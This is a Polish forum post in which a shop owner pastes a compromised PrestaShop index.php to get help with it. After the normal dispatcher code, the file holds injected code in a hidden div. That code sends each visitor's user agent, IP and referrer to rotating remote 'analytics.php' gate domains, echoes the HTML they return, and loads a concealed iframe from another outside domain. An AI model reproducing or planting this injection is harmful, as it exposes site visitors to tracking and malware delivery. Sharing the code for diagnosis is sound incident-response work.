Jeszcze tak dopytam czy zaglądałeś ostatnio do działu aktualności i wpisie o bezpieczeństwie?
Wstyd się przyznać ale nie. Standardowo odwiedzam dział dla początkujących. Zlekceważyłem niebezpieczeństwo.
Oto cały plik index.php:
<?php
/*
* 2007-2015 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
*
http://opensource.org/licenses/osl-3.0.php* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@prestashop.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to
http://www.prestashop.com for more information.
*
* @author PrestaShop SA <contact@prestashop.com>
* @copyright 2007-2015 PrestaShop SA
* @license
http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
* International Registered Trademark & Property of PrestaShop SA
*/
require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();
echo "<div style=\"visibility: hidden !important;\">
<?php
error_reporting(0);
ini_set('display_errors', false);
ini_set('html_errors', false);
$gate_list = array(
'
http://babyreva.com/analytics.php',
'
http://mongotruck.com/analytics.php',
'
http://mokrotune.net/analytics.php',
);
$settings = array(
\"gate_list\" => $gate_list,
\"marker\" => \"0194f\",
\"html\" => \"\",
);
function get_params(){
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$ip = trim($tmp[count($tmp) - 1]);
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
$referrer = '';
if(array_key_exists('HTTP_REFERER', $_SERVER)){
$referrer = urlencode($_SERVER['HTTP_REFERER']);
}
return \"?action=get&ua=$ua&ip=$ip&referrer=$referrer&lang=$lang\";
}
function get_gate_data(){
global $settings;
$url = $settings[\"gate_list\"][array_rand($settings[\"gate_list\"])].get_params();
$answer = @file($url);
if(($answer)&&(strpos(implode(\"\", $answer), $settings[\"marker\"])>0)){
$settings['html'] = implode(\"\", $answer);
return true;
} else
return false;
}
if((get_gate_data())||(get_gate_data())||(get_gate_data())){
echo rawurldecode($settings['html']);
}
<<<EOF
>
<div style=\"left:11px; position:absolute !important; top:-1480px; font-color: red; font-size: 14px;\"><iframe src=\"
http://driftenoma.net/google_counter.php\" width=\"1024\" height=\"768\"></iframe></div>
EOF;
?>
</div>";